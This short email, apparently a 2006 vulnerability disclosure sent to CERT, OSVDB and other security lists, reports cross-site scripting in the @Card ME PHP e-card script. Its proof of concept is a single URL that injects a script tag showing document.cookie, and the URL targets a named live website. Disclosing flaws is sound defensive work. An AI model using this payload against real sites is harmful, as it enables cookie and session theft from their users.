From: preddy . <lil.turk@email.com>
To: cert@cert.org, Vuln@frsirt.com, moderators@osvdb.org, vuln@secunia.com, news-editor@securityfocus.com
Date: Tue, 03 Jan 2006 12:29:15 -0500
Subject: [OSVDB Mods] @Card ME PHP ( Cross Site Scripting)

@Card ME PHP ( Cross Site Scripting)

Vendor URL: http://www.ecardmax.com/

PoC:

http://www.thechanceryhouse.com/ecards/index.php?page=1&cat="><script>alert(document.cookie)</script>&lang='


Preddy
RootShell Security Group